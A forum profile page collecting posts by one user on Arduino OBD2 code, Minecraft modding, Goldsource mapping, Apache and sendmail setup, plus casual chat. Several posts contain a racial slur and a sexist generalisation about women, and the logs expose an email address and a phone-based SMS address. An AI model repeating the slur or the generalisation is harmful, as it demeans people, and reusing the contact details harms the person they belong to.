|
|
|
Posts written by sprinkles:
In C++ broken stuff whatever shit dog by sprinkles:
Nope. Checked 5+ times. All the file names are the exact same. BlackThornDemon. I just started copying the header and source to all the folders on my hdd. Works now.
In C++ broken stuff whatever shit dog by sprinkles:
cluster.ino|2|error: BlackThornDemon.h: No such file or directory| cluster.ino|3|error: 'BlackThornDemon' does not name a type| src\BlackThornDemon.cpp|2|error: BlackThornDemon.h: No such file or directory| src\BlackThornDemon.cpp|4|error: 'BlackThornDemon' has not been declared| cluster.ino code #include <Arduino.h>#include <BlackThornDemon.h> BlackThornDemon obd2(2); char rxData[20]; byte rxIndex=0; byte speed=0; /* rpm is returned at 1/4 the actual rpm so the range should be 0-2000 */ int rpm=0; float fuel=0.00; /* int because byte only goes to 255 noraml operatring temps are ~190-200f so the possibility of the coolant temp getting over 255 is evident and if your car is on fire you prolly want to know */ int coolantTemp=0; // NOTE: we have to read this from the storage device int odometer=0; int trip=0; void setup() { Serial.begin(9600); // so we can talk to obd2 delay(500); Serial.println("ATZ"); //reset obd2 delay(1000); Serial.flush(); // purge the serial buffer } void loop() { Serial.flush(); Serial.println("010D"); // tell obd2 to send us speed //obd2.GetResponse(); // returns the command we sent ("010D") //obd2.GetResponse(); // returns the data } blackthorndemon.h c code #ifndef BlackThornDemon_h#define BlackThornDemon_h #include "Arduino.h" class BlackThornDemon { public: BlackThornDemon(int pin); void GetResponse(); virtual ~BlackThornDemon(); protected: private: }; #endif // BLACKTHORNDEMON_H blackthorndemon.c c code #include "Arduino.h"#include "BlackThornDemon.h" BlackThornDemon::BlackThornDemon(int pin) { pin = pin + pin; } BlackThornDemon::GetResponse() { } BlackThornDemon::~BlackThornDemon() { //dtor }
In I'm either gonna quit mapping or switch to something else .. by sprinkles:
SuperJer said: One thing that's very counter-intuitive is that, in the newer stuff, you can have even less world brushes. If you have more than 6 or so world brushes per room, things will go to shit.
So what you are saying is, Valve made this game?
In New CSGO map: de_substation by sprinkles:
Rockbomb said: It's so pretty :3
Is there a CS:GO server anyone here frequents? superjers you no has csgoserver?
In hey n00b commander by sprinkles:
That's right. The Americans took you out. And don't you forget that nigga.
In Hittn' Them Keys With Molto Passione! by sprinkles:
You should put LEDs in your beard superjer. just sayin
In LINK TO FORUMS PLS by sprinkles:
NatureJay said: RANDOMIZE THE POSITION OF ALL BUTTONS ON EACH PAGE LOAD! EVERYONE MUST SUFFER!
+1
In LINK TO FORUMS PLS by sprinkles:
ugh Can the superjer.com link in the titlebar link to the forums instead of superjer.com? pls pls pls \ Oh, there's a forum button..... delete pls pls pls
In My Real Truck by sprinkles:
fedex _ said: sprinkles said: I want this to be very clear.
Fuck Fords. Umm my truck is a chevy lmao You happy its not a ford? I'll take pictures of my car today. I'll make sure I get good pics of the engine falling apart.
In Another video that Rockbong will like by sprinkles:
Rockbomb said: SuperJer said: WHERE'S RACKBAMB?!
I still pop in and check stuff out. Haven't really been active as far as posting goes cuz my phone is the only source of internet I have right now, and I'm usually too lazy to tether to my phone so I can use a keyboard xD Whoa bro, you're still alive? whereub?
In create a stairs with a lot of pole, but compile need a long time by sprinkles:
michaelhn said: superjer said: michaelhn said: is it okay if a make the "a lot of pole" with boxshape not the circle shape??? No. This game is from 1998 and can not handle that many objects or polygons. You need to use one big texture or something else more appropriate for 1998 tech. so.. dead end? no such way that make me can build a lot of pole for my stair? No. Try making maps for games people actually play.
In create a stairs with a lot of pole, but compile need a long time by sprinkles:
You shouldn't be making anything that's not a square.
In Java related Qs by sprinkles:
Down Rodeo said: What are you doing?
I didn't do it. https://github.com/cpw/FML/blob/master/common/cpw/mods/fml/common/registry/GameRegistry.java#L173
In Java related Qs by sprinkles:
code public static void registerBlock(net.minecraft.src.Block block,Class<? extends ItemBlock> itemclass) Class<? extends ItemBlock> ??
In I have no name :( by sprinkles:
This will be the official thread for the yet unamed project. Basically, this mod will be like an EE 2 energy condenser. There will be key differences though. I am just now making an outlined brainstorm plan idea. Updates as soon as I make them. Here's somethings we do know: 1) the entity will have to 'learn' the item (you sacrifice it) 2) you will be able to pump in and out of it (buildcraft) 3) only ingots (and some fuels) are allowed to be 'made' (iron, tin, copper, gold, etc) 4) YOU CANNOT MAKE DIAMONDS (get over it) 5) fuels can only be turned into other fuels (coal into uranium, etc.) 6) stacks of items wont be immediately processed (so if you accidently drop something in there you can get it back) 7) it may require fuel of some sort Source: https://github.com/BlackThornDemon/dominus
In Craftmine Mods by sprinkles:
https://github.com/BlackThornDemon/titanium superjer doesn't auto link https? I've decided I'm going to bring energy condensers back. Fuck EE3, I'm bringing them back. I'm tired of stacks of cobble and dirt. (I'll try not to copy paste EE2 :P)
In Craftmine Mods by sprinkles:
code Sprinkles@SPRINKLES-PC /C/Users/Sprinkles/Programming/mcp/reobf/minecraft/blackThornDemon (master) $ git push origin master Username for 'https://github.com': BlackThornDemon Password for 'https://BlackThornDemon@github.com': To https://github.com/BlackThornDemon/diana.git ! [rejected] master -> master (non-fast-forward) error: failed to push some refs to 'https://github.com/BlackThornDemon/diana.git ' hint: Updates were rejected because the tip of your current branch is behind hint: its remote counterpart. Merge the remote changes (e.g. 'git pull') hint: before pushing again. hint: See the 'Note about fast-forwards' in 'git push --help' for details.
In Craftmine Mods by sprinkles:
Titanium Rutile Ore Sword Pickaxe Axe Spade Hoe natural ore generation all done I'll try to upload the code to github next armor other stuff buildcraft
In Craftmine Mods by sprinkles:
I was going to post this on github, but idk how to use that shit. http://speedy.sh/5bphq/diana.zip
In McDiddy's Game / SPARToR by sprinkles:
superjer said: Bumping this isn't going to make me work on SPARToR any faster.
In i doesn't want to, but i canwalk through wall by sprinkles:
michaelhn said: so the aaatrigger texture make me can walk through wall?
The aaatrigger is a special texture that makes a wall a non-solid. So you can walk through it, like water. michaelhn said: even i didn't brush the wall which error with the aaatrigger..?
The default texture is usually aaatrigger (I think). michaelhn said: can u can explain what is vis group, and how to delete it
Please don't ever use vis groups. You barely know how to use walls...
In i doesn't want to, but i canwalk through wall by sprinkles:
Everyone knows 'aaatrigger' makes walls invisible, its a special texture.
In i doesn't want to, but i canwalk through wall by sprinkles:
Rockbomb said: fedex _ said: your dumb
![]() l 0 l
In Craftmine Mods by sprinkles:
SUCCESS. I have created titanium. You smelt Rutile Ore into Titanium. You can then craft a titanium sword. next titanium pickaxe titanium axe titanium hoe titanium spade PROFIT
In Craftmine Mods by sprinkles:
fjakdl;fjda So wikipedia dunt lernt me somtin ADNRs are man made diamonds http://en.wikipedia.org/wiki/Aggregated_diamond_nanorod Basically, you can compress graphite or fullerene into ADNR. Industrial Craft has a compressor. http://www.industrial-craft.net/ Plan 1) Graphite Ore 2) learn industrial craft api 3) graphite ore -> compressor -> adnr 4) adnr tools 5) adnr INDUSTRIAL CRAFT TOOLS (drills, etc.) 6) elephant sex 7) youtube elephant sex 8) eat elephant ear
In Craftmine Mods by sprinkles:
MY FIRST MINECRAFT MOD java code package blackThornDemon; import cpw.mods.fml.common.Mod; import cpw.mods.fml.common.Mod.Init; import cpw.mods.fml.common.event.FMLInitializationEvent; import cpw.mods.fml.common.network.NetworkMod; import cpw.mods.fml.common.registry.GameRegistry; import net.minecraft.src.Item; import net.minecraft.src.ItemStack; import net.minecraft.src.Block; @Mod(modid = "BlackThornDemon", name = "BlackThornDemon", version = "0.00.01") @NetworkMod(clientSideRequired = true, serverSideRequired = false) public class Firsties { @Init public void load(FMLInitializationEvent event) { GameRegistry.addRecipe(new ItemStack(Item.pickaxeDiamond), new Object[] { "XXX", " | ", " | ", 'X', Block.dirt, '|', Item.stick }); } }
In Hai guys ^.^ by sprinkles:
Do you just download the game? Or do you have to register for beta? Wtf, you can't drag the updater across monitors?
In Euler Answers by sprinkles:
DR said you might have some cool projects/problems like this, superjer. If you do, would you share/make a contest for them?
In Change Sound Device by sprinkles:
Well, I frequently use my headset. It has Dolby Digital shit with 7.1 surround sound. It plugs into my usb port. I wanted to switch from my headset to my speakers without un-plugging/plugging in my headset. I found this: http://downloadsquad.switched.com/2010/06/16/windows-7-tip-how-to-change-the-default-audio-device-with-a-hot/
In Terridax's Mom's Recipe by sprinkles:
recipe code Ingredients:1 tablespoon vegetable oil 4 (4 ounce) skinless, boneless chicken breast halves, cut into cubes 4 teaspoons chili powder 2 teaspoons ground cumin 1 large onion, chopped 1 medium green pepper, chopped 1 (10.75 ounce) can Campbell's condensed Cream of Chicken soup 3/4 cup of water 1 1.2 cups frozen whole kernel corn 2 (15 ounce) cans white kidney beans (cannelloni), rinsed and drained 2 tablespoons shredded cheddar cheese Directions 1.) Heat the oil in a 4-quart saucepan over medium-high heat. Add the chicken, chili powder, cumin, onion and pepper and cook until the chicken is cooked through and the vegetable are tender, stirring often. 2.) Stir the soup, water, corn and beans in the saucepan and heat to a boil. Reduce the heat to low Cover and cook for 5 minutes, stirring occasionally. Sprinkle with the cheese. 3.) Insert funnel inside ass-hole. Pour hot chili into funnel. Excrete. Enjoy.
In Tribes Ascend by sprinkles:
Down Rodeo said: (in fairness I'm probably not going to play it, for a variety of reasons).
In Tribes Ascend by sprinkles:
Ffs I'll get the link myself. https://account.hirezstudios.com/tribesascend/?ad=1&utm_source=Liquid&utm_medium=Adwords&utm_campaign=Adwords&gclid=COf9ofuO_q4CFUXc4AodBi6T3A Jesus was that so hard? IT'S HALO.
In Euler Answers by sprinkles:
http://projecteuler.net/problem=2 C# code using System;using System.Collections.Generic; using System.Linq; using System.Text; namespace ConsoleApplication1 { class Program { static void Main(string[] args) { int Lux = fibonacci_numbers(); Console.WriteLine(Lux); Console.ReadLine(); } private static int fibonacci_numbers() { // x=n-1 // y=n-2 int x = 3; int[] array = new int[34]; int fib = 0; array[0] = 0; array[1] = 1; array[2] = 1; while (x < 34) { array[x] = array[x-1] + array[x-2]; x++; } foreach (int element in array) { if (element % 2 == 0) { fib += element; } } return fib; } } } // 2 // 2
In Tribes Ascend by sprinkles:
Rockbomb said: SRAW said: Unreal 3 engine ewwww
The Unreal Engine is badass. Give us a link.
In FUS ROH SUPERJER by sprinkles:
Pros: It's a fun for an hour. Cons: It's a fun for an hour. http://darkwestern.deviantart.com/art/Game-over-man-Game-over-CAT-42971028?q=boost%3Apopular%20game%20over&qo=18
In Need some more help... by sprinkles:
C# code using System;using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; namespace forRB { public partial class Form1 : Form { public Form1() { InitializeComponent(); } int[] numbers = new int[20]; int counter = 0; private void input_KeyUp(object sender, KeyEventArgs e) { if (e.KeyCode == Keys.Enter) { int bob; bool result = Int32.TryParse(input.Text, out bob); if (!result) { input.Text = ""; return; } else { if (Convert.ToInt32(input.Text) >= 10 && Convert.ToInt32(input.Text) <= 100) { if (counter < 20) { inclusiveLB.Items.Add(input.Text); bool repeated = false; foreach(int i in numbers) { if(i == Convert.ToInt32(input.Text)) { repeated = true; break; } } if (repeated == false) { uniqueLB.Items.Add(input.Text); } else { uniqueLB.Items.RemoveAt(uniqueLB.Items.IndexOf(input.Text)); } numbers[counter] = Convert.ToInt32(input.Text); input.Text = ""; } else { input.Text = ""; } } else { MessageBox.Show("You must enter a number between 10 and 100." + Environment.NewLine + "You entered \"" + input.Text + "\"", "Number Out of Range", MessageBoxButtons.OK); } } counter++; } else if (e.KeyCode == Keys.Escape) { inclusiveLB.Items.Clear(); uniqueLB.Items.Clear(); input.Text = ""; counter = 0; } } } }
In Need some more help... by sprinkles:
Rockbomb said: Also, I don't understand "For(i in array)".
It iterates through the array elements. So: php code <?php $myarray = array[50,100,150,299,863]; for($i in $myarray) { print $i; } //$i = 50,100,150,299,863 ?> That is not valid php by the way. But I hope you get the point.
In Small issue with armoury_entity by sprinkles:
Rockbomb said: Mate de Vita said: I'm sure the OP will soon appreciated your post... 4 years ago.
Fixed. Fixed.
In Map starts after compiling in VHE, but .......... by sprinkles:
Rockbomb said: Can you post a compile log for your map, please?
It's possible there could be a leak, in which case it wouldn't recognize your entities. If there was a leak the map wouldn't compile at all.
In Map starts after compiling in VHE, but .......... by sprinkles:
Make sure you have an info_playerstart instead of info_playerdeathmatch. By default it only checks for info_playerstart.
In i think you guys will enjoy this. by sprinkles:
the_cloud_system said: fool i can barely tie my shoe let alone toster the ashtray.
I can fix that.
In Props Help by sprinkles:
Its been a while since I've mapped, but I believe its env_sprite. Then you set the path to the model (inside your cstrike folder).
In Props Help by sprinkles:
prop_static and ragdoll are entities for Counter Strike Source, not Goldsource. There is an equivalent func_wall in Goldsource however.
In I have no name :( by sprinkles:
Rockbomb said: Does the mod work fine if you use a different map, and not the one you made?
That's the first thing to determine; is it your map or amx_super.
In Do my vb.net homework for me. Nao. by sprinkles:
Rockbomb said: How did you get b = 00000111?
00000010 00000101 00000111 Its an XOR so all the ones are kept, zeros remain zero, and duplicate ones become zero.
In Do my vb.net homework for me. Nao. by sprinkles:
code a ^= b;b ^= a; a ^= b; a = 00000010 (binary form of 2) b = 00000101 (binary form of 5) a ^= b a = 00000010 b = 00000111 b ^= a a = 00000101 b = 00000111 a ^= b a = 00000101 b = 00000010 If that doesn't make sense then look up bitwise operations.
In Do my vb.net homework for me. Nao. by sprinkles:
Down Rodeo said: So given that can you tell me what this does?
code void f(int a, int b){ a ^= b ^= a ^= b; } It switches the variables. a now = b, and b now = a.
In Do my vb.net homework for me. Nao. by sprinkles:
Hello red team jungler, you came up into my lane. I have got no mana jus' some enerGG. Wha-wha-whaa What did you see how I'm on a killing spree? Sorry you cannot stop me. I'll show no mercy.
In Do my vb.net homework for me. Nao. by sprinkles:
No. It has to do with the bits of the number, not the actual number.
In Do my vb.net homework for me. Nao. by sprinkles:
Can anyone tell me what this operator does? code ^=I tried searching it on google and bing, but they seem to 'break' when I do... Bitwise XOR assignment
In Do my vb.net homework for me. Nao. by sprinkles:
Down Rodeo said: ++x and x++?
That's useful, thanks.
In Do my vb.net homework for me. Nao. by sprinkles:
Down Rodeo said: Ewww, vb.net. That's really nasty. These programs are funny :D
I couldn't imagine coding without brackets and semicolons. So unorganized. D:
In Do my vb.net homework for me. Nao. by sprinkles:
Would this work for you? code for($i=1;$i<=10;$i++) // this would go through our rows{ for($p=1;$p<=$i;$p++) // add elements to our rows { echo "*"; } next { echo "/n/r"; // print out a linebreak -unix } } next { exit(); } I'd think that would work, but of course you would write it in vb not php :P
In Do my vb.net homework for me. Nao. by sprinkles:
If I remember correctly, everything in the for loop gets executed,then when the for loop is completely finished it goes to next. Let me see if I can't whip up something. Does it have a limit like the picture? or does it continue indefinitely.
In Warning - Leak in Hull by sprinkles:
The map is small and simple. The time it would take you to fix the leaks would be far greater than the time it would take to rebuild the map. It'd probably take you 20-30 mins to fix the leaks, rebuilding the map would take 2-3 mins.
In Warning - Leak in Hull by sprinkles:
Delete the map and start over. Do you have "snap to grid" turned off, or do you have the grid size set to 1? NOTHING in your map lines up. It's not a surprise you have leaks everywhere.
In Warning - Leak in Hull by sprinkles:
And, this certainly does not help your lag issue: Quote: - Warning: Larger than expected texture (348972 bytes): 'SPECIAL_THANKS'
- Warning: Larger than expected texture (348972 bytes): 'THANKS'
In Post From PHP Page to PHP Page by sprinkles:
superjer said: What are you actually trying to accomplish?
I want it so when I it. No but for reals, I have error.php which handles all my errors and displays a user friendly 'error' page (and if its an admin tells them the error). It also does fancy things like log the error and notify me. So naturally, when we encounter an error I want to send the error to error.php. For example: I spill some soap (the gel kind, because you can't really spill a bar [unless you melt it]) on my database. index.php phreaks out cause it can't connect to the database. So it sends the data/error to error.php. Then error.php nicely says "THE FUCKING DATABASE IS BROKEN D: ," logs the error, and notifies me. That's pretty much what I want to happen. I did accomplish this using sessions (and after displaying the error page we set the session['error'] back to null). But is there anyother way?
In Post From PHP Page to PHP Page by sprinkles:
I wanted to know if I could post from within php to another php file. Example PHP code try { // code } catch (Exception $e) { // post $e to error.class.php } Maybe not post per se, but at least send data ($e) to another php page (error.class.php) And not through sessions. I know it can easily be done using sessions, but for some reason I don't like that idea.
In Video Player by sprinkles:
Down Rodeo said: Also you have a picture of text. I'm not saying you made it but I can't read any of the small print. This is a bad thing.
EDIT: Jesus Christ it's a JPG. Who the hell even does that?! Wha?
In $_GET Vulnerable? by sprinkles:
I was jus' wondering if $_GET was vulnerable, like to mysql injection, xss, or whatever?
In Server Internet Issues by sprinkles:
So I recently disconnected my modem/router. Afterwards I did a hard reboot of my server, and now people cannot connect to it. Its connected via Ethernet, and I can ping other websites from it. I can connect to it from within my LAN. I checked the router and all the ports are still forwarded. Any ideas?
In Video Player by sprinkles:
I was wondering how to make my own video player for my website. I really don't want to use flash. Any ideas?
In Funny shit all will enjoy! by sprinkles:
Rockbomb said: the_cloud_system said: SRAW said: HAHA BOOBS ARE FUNNY
In The Official Omegle™ Truck by sprinkles:
You're now watching two strangers discuss your question! Question to discuss: What is 2+2? Stranger 1: 4. Stranger 2: 5 Stranger 2: 1984 Stranger 2: hahahah Stranger 2: sorry I'm kind of a nerd Stranger 1: 1984? Stranger 2: the book Stranger 2: haha Stranger 1: Wtf? Stranger 2: you've never read it? Stranger 1: No. Stranger 2: oh Stranger 2: are you horny? Stranger 1: No. Stranger 2 has disconnected
In SOPA , PIPA , ???????/ by sprinkles:
fedex _ said: but it will never happen
Its passing right now, 70 to 30.
In Superjer's Cookies by sprinkles:
Soups can you tell me how you setup the cookies on your site and how they work?
In Dream Time by sprinkles:
aaronjer said: THERE IS NO ONE ELSE IN THE HOUSE
Wanna have a sleep over?
In And, This is Why we All Love Riot by sprinkles:
They were limited. They removed them from the store last patch.
In halp mah plox by sprinkles:
code What Is a Bluetooth Stack?A Bluetooth stack is an application installed on your computer that interacts with your Bluetooth devices. Two Bluetooth stacks are widely in use today: The Microsoft Bluetooth stack, which comes with Windows XP Service Pack 2 The Widcomm Bluetooth stack Most Bluetooth adapters use the Widcomm Bluetooth stack driver. Widcomm (acquired by Broadcom, http://www.broadcom.com) licenses its software to most Bluetooth manufacturers. Consequently, the installation, configuration, and use of different Bluetooth devices on Windows have a nearly identical look and feel. The problem with the Bluetooth stack built into Windows XP SP 2 is that it has limited support for profiles. In particular, it does not support the Headset profile required to connect with Bluetooth headsets, and hence your Bluetooth headsets will not be able to work with your Windows XP PC. To overcome the limitations in the Windows Bluetooth stack, you can install the Widcomm Bluetooth stack drivers from the manufacturer of your Bluetooth device. You can download the latest drivers and support software from the adapter vendor's web site. Because each vendor customizes the Widcomm software slightly, you should not use drivers from a vendor other than the one that manufactured your Bluetooth adapters.
In Need some help with BIND by sprinkles:
Rockbomb said: Lol... I went to go reply to your post, and I was reading it before you edited it. I was gonna copy/paste what you had and change the top 2 lines of your virtualhosts to what you have now... but when I went to quote it, they were already changed, and I was like... wtf?
But anyways, I can confirm it's working on my end as well :D Now all you gotta do is put up a good collection of porn (remember to keep it pretty low-res on the mobile version) and everything should be good to go The attn button is so under rated.
In Need some help with BIND by sprinkles:
Like this? code NameVirtualHost sprinkles1435.us:80<VirtualHost sprinkles1435.us:80> DocumentRoot "/var/www/" ServerName sprinkles1435.us <Directory "/var/www/"> allow from all Options -Indexes </Directory> </VirtualHost> NameVirtualHost mobile.sprinkles1435.us:80 <VirtualHost mobile.sprinkles1435.us:80> DocumentRoot "/var/www/mobile/" ServerName mobile.sprinkles1435.us <Directory "/var/www/mobile/"> allow from all Options -Indexes </Directory> </VirtualHost> Because I can't get it to work. Woot! Superjer+Google = code <VirtualHost *:80> DocumentRoot "/var/www/" ServerName sprinkles1435.us <Directory "/var/www/"> allow from all Options -Indexes </Directory> </VirtualHost> <VirtualHost *:80> DocumentRoot "/var/www/mobile/" ServerName mobile.sprinkles1435.us <Directory "/var/www/mobile/"> allow from all Options -Indexes </Directory> </VirtualHost> It works!
In Need some help with BIND by sprinkles:
So I determined that this does work. The problem is when I try to redirect the mobile device to mobile.sprinkles1435.us. If I omit code header("LOCATION: http://mobile.sprinkles1435.us/");Then I can go to both the domain and subdomain. Any ideas on a work around/fix?
In Need some help with BIND by sprinkles:
So I changed it to: httpd.conf code <VirtualHost mobile.sprinkles1435.us:80> DocumentRoot "/var/www/mobile/" ServerName mobile.sprinkles1435.us <Directory "/var/www/mobile/"> allow from all Options -Indexes </Directory> </VirtualHost> It seems to work, but my phone says: Data connectivity problem The page contains too many server redirects.
In Need some help with BIND by sprinkles:
Wait, no. Now sprinkles1435.us doesn't exist. It redirects everything to mobile.sprinkles1435.us.
In Need some help with BIND by sprinkles:
http.conf code NameVirtualHost mobile.sprinkles1435.us:80<VirtualHost mobile.sprinkles1435.us:80> DocumentRoot "/var/www/mobile/" </VirtualHost> 000-default code <VirtualHost *:80>ServerAdmin webmaster@localhost DocumentRoot /var/www <Directory /> Options FollowSymLinks AllowOverride None </Directory> <Directory /var/www/> Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny allow from all </Directory> ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ <Directory "/usr/lib/cgi-bin"> AllowOverride None Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all </Directory> ErrorLog ${APACHE_LOG_DIR}/error.log # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. LogLevel warn CustomLog ${APACHE_LOG_DIR}/access.log combined Alias /doc/ "/usr/share/doc/" <Directory "/usr/share/doc/"> Options Indexes MultiViews FollowSymLinks AllowOverride None Order deny,allow Deny from all Allow from 127.0.0.0/255.0.0.0 ::1/128 </Directory> </VirtualHost> <VirtualHost *> DocumentRoot "/var/www/mobile/" ServerName sprinkles1435.us ServerAlias www.sprinkles1435.us ServerAlias mobile.sprinkles1435.us <Directory "/var/www/mobile/"> allow from all Options -Indexes </Directory> </VirtualHost> I can't get it to work, and I don't know what I'm doing...
In Funny Bug? by sprinkles:
So when I access my site from within my lan via the domain name it takes me to the router page. When I access my site from my phone (disconnected from my network/internet) it takes me to my site, not the router page. When I access my site from within my lan via ip address it takes me to my site. Is there anyway I can disable the router page when I access it from within my lan via domain name?
In allocateing ram to my graphics. by sprinkles:
Rockbomb said: I'm tempted to try it out, just for kicks. But, I'm too lazy, and I don't really need to do it (already have 2gb of video ram).
On your desktop?
In TV help by sprinkles:
SRAW said: Well we went to the shop and they said that they most probably will give a box, so all is fine.
And also a testament to how dumb americans are: We went to a restaurant an hour ago and there was this lady, and we said that we just came from malaysia 2 days ago. She said "Is that where the Taj Mahal is?" And she is from the Philipines (which is right next to malaysia):facepalm: No. That is a testament to how stupid women are.
In Music You Recently Discovered! by sprinkles:
Rockbomb said: You seriously have the worst taste in the world, when it comes to dubstep. Everything you like sounds like some 8 year old was messing around in FL Studio for the first time and his parents decided to upload the song to make the kid feel good.
We all know your music taste =/ my music taste.
In Send and Email by sprinkles:
superjer said: Did it just hang after your
code echo hello |sendmail -v me1435@hotmail.comYou should try sending mail somewhere other than hotmail, too. I think most of the big email providers are pretty picky about who they accept mail from. And how many firewalls are you behind? code 050 <7195572385@txt.att.net>... Connecting to mx.cingularme.com. via esmtp...050 <7195572385@txt.att.net>... Deferred: Connection timed out with mx.cingularme.com. 250 2.0.0 pBK6VH94005379 Message accepted for delivery 7195572385@txt.att.net... Sent (pBK6VH94005379 Message accepted for delivery) Closing connection to [127.0.0.1] >>> QUIT 221 2.0.0 ubuntuServer.westell.com closing connection Does it matter that I don't have a domain name yet?
In Send and Email by sprinkles:
Rockbomb said: sudo
STFU Also: code mike@ubuntuServer:~$ echo hello |sendmail -v me1435@hotmail.comme1435@hotmail.com... Connecting to [127.0.0.1] via relay... 220 ubuntuServer.westell.com ESMTP Sendmail 8.14.4/8.14.4/Debian-2ubuntu2; Mon, 19 Dec 2011 12:27:48 -0500; (No UCE/UBE) logging access from: localhost(OK)-localhost [127.0.0.1] >>> EHLO ubuntuServer.westell.com 250-ubuntuServer.westell.com Hello localhost [127.0.0.1], pleased to meet you 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-EXPN 250-VERB 250-8BITMIME 250-SIZE 250-DSN 250-ETRN 250-AUTH DIGEST-MD5 CRAM-MD5 250-DELIVERBY 250 HELP >>> VERB 250 2.0.0 Verbose mode >>> MAIL From:<mike@ubuntuServer.westell.com> SIZE=6 AUTH=mike@ubuntuServer.westell.com 250 2.1.0 <mike@ubuntuServer.westell.com>... Sender ok >>> RCPT To:<me1435@hotmail.com> >>> DATA 250 2.1.5 <me1435@hotmail.com>... Recipient ok 354 Enter mail, end with "." on a line by itself >>> .
In Send and Email by sprinkles:
code mike@ubuntuServer:~$ service sendmail statusMSP: is run via cron (20m) tail: cannot open `/var/run/sendmail/mta/sendmail.pid' for reading: Permission denied MTA: ERROR: List of process IDs must follow -p. ********* simple selection ********* ********* selection by list ********* -A all processes -C by command name -N negate selection -G by real group ID (supports names) -a all w/ tty except session leaders -U by real user ID (supports names) -d all except session leaders -g by session OR by effective group name -e all processes -p by process ID T all processes on this terminal -s processes in the sessions given a all w/ tty, including other users -t by tty g OBSOLETE -- DO NOT USE -u by effective user ID (supports names) r only running processes U processes for specified users x processes w/o controlling ttys t by tty *********** output format ********** *********** long options *********** -o,o user-defined -f full --Group --User --pid --cols --ppid -j,j job control s signal --group --user --sid --rows --info -O,O preloaded -o v virtual memory --cumulative --format --deselect -l,l long u user-oriented --sort --tty --forest --version -F extra full X registers --heading --no-heading --context ********* misc options ********* -V,V show version L list format codes f ASCII art forest -m,m,-L,-T,H threads S children in sum -y change -l format -M,Z security data c true command name -c scheduling class -w,w wide output n numeric WCHAN,UID -H process hierarchy So I followed this: Quote: So I renamed the sendmail.pid in sendmail.in.pid, chowned it to root smmsp, and it works. Sendmail status tells me that everything is ok.
Brian: thank you for the idea. Best wishes from Cologne. And the result is now this: code mike@ubuntuServer:~$ service sendmail status MSP: is run via cron (20m)MTA: 807 /usr/sbin/sendmail-mta -Am -L sm-mta -bd -q10m UID PID PPID C STIME TTY TIME CMD root 807 1 0 Dec18 ? 00:00:01 sendmail: MTA: accepting connections Daemon Status: Sendmail is running but not answering status queries. No response QUE: Same as MTA
In Send and Email by sprinkles:
How do you send an email in php? I've tried everything I found on google. mail(); download sendmail apt-get install a smtp server some random php scripts gmail I'm at a loss.
In FTP Access by sprinkles:
I jus' checked and I still have ftp access. I don't need it anymore so I cleaned out the dir. You can feel free to delete the account or whatever you want to do with it.
In Something wrong with firefox by sprinkles:
SRAW said: down rodeo is scottish
I'm 50% Scottish. I guess that explains this red beard.
In what is function of Pitch Yaw Roll??? by sprinkles:
http://www.freemmorpglist.com/Shadowland_Online-mmorpg.html That game looks like it had a budget of $3.
In Something about a password... by sprinkles:
superjer said: I think you actually forgot your user name. It was just Runetribe before, according to my records.
And, he has the records. Wait. You should say "according to my database" instead.
In Array initialization (or lack thereof) by sprinkles:
superjer said: calloc()
Don't call the Wizard of Oz!
In Winter Season by sprinkles:
So its Winter, or almost Winter, whatever. What do you like doing during the winter? I snowboard and eat. Also I like Nike.
In Hammer units in GoldSrc Hammer? by sprinkles:
No. That is a new feature they added in Hammer 4.1.
In interesting things by sprinkles:
You can try the whole "potato light-bulb" thing. http://www.youtube.com/user/Stevespanglerscience He has some cool shit.
In I built a real fucking chair! by sprinkles:
Superjer should have a contest to see who can make the coolest thing out of wood. BTW, I like the dynamics of that last picture; the lighting, and focus.
In breakable func_door? by sprinkles:
I believe func_door has the attr 'health,' set that to a good amount.
In The Friartruck about fixing my second computer by sprinkles:
buq25 said: I have the same problem/s with wire.
In laptops the wireless router is commonly also the modem.
In I Was Choosen by sprinkles:
Rockbomb said: And in Sprinkles case, he will go back home and do whatever the fuck he wants, and get paid for it
Guy I will be deployed within 3-6 months of getting back home.
In I Was Choosen by sprinkles:
Rockbomb said: Sprinkles is probably making about 1600-1700 a month (800-850 bimonthly). Which really isn't that much... not even $20k a year.
No, I get paid $614 biweekly. $1200ish a month. But soon I will be getting more for h8 certified. :P
In I Was Choosen by sprinkles:
aaronjer said: People join the army either because they suck at everything else or because they want to pile up money. You have no expenses when you're in the military so even with low pay you kinda rake in the cash.
Wrong on both accounts. Try again?
In Chamber's Rage Quits Life by sprinkles:
This is a guy from our room. He gets mad because the sergeants flipped his bed.
In 'LeafThread' takes forever! by sprinkles:
racsO said: The map is very complex with a lot of small shapes and vertex manipulation.
In Num_edicts by sprinkles:
Dude its been so long since I've run a server, I don't know. All I know now is how to shoot and fix trucks, thanks Army.
In Num_edicts by sprinkles:
I would think of it the other way. I think its trying to tell you the server is not running on that setting. I believe the server would automatically change the property of the clients.
In What is env_ and for what it is? by sprinkles:
environment i.e. env_explosion would be a explosion that's relative to the environment
In Counter-Strike Global Offensive by sprinkles:
SRAW said: The engine is based on source
Source still?
In Need Pro help - Reliable channel overflowed by sprinkles:
This makes sense. You must calculate in the weapons and characters as well. A lot of people on the server would cause the error. And, why do you need 490 entities?
In Counter-Strike Global Offensive by sprinkles:
I was going to make a thread on this.... Looks like more noobs will be coming to superjer.com [points towards *hint*]
In Making Objects size precise and realistic ? by sprinkles:
No. 1x1x1 is the smallest grid size and smallest block size.
In New Mapping Section by sprinkles:
superjer said: Isn't that game not released until November?
Correct. I love you too Rockbomb.
In New Mapping Section by sprinkles:
The third entry into the Elder Scrolls series is Skyrim. And I know you can map for Oblivion,and its fun. So I was wondering if we could open a mapping section for the new Skyrim (if you can map for it like Oblivion)?
In no buyable weapons by sprinkles:
Anis1302 said: buq25 said: Anis1302 said: You can add info_game_parameters and under Weapon Buying you can put Neither Ct's and T's can't buy weapons !
Great, you're just 5 months late. I'm just trying to help him ! I am pretty sure if he hasn't figured out a solution in 5 months...
In SuperJer.com Official Hiking Coterie by sprinkles:
Also we will have to go on a 5-7 day hiking trip.
In SuperJer.com Official Hiking Coterie by sprinkles:
Hey rb, we should go hiking every week when I get back. 10 miles every Sunday?
In Another compilation error by sprinkles:
Read the above posts. You have the same problem, and thus require the same solution.
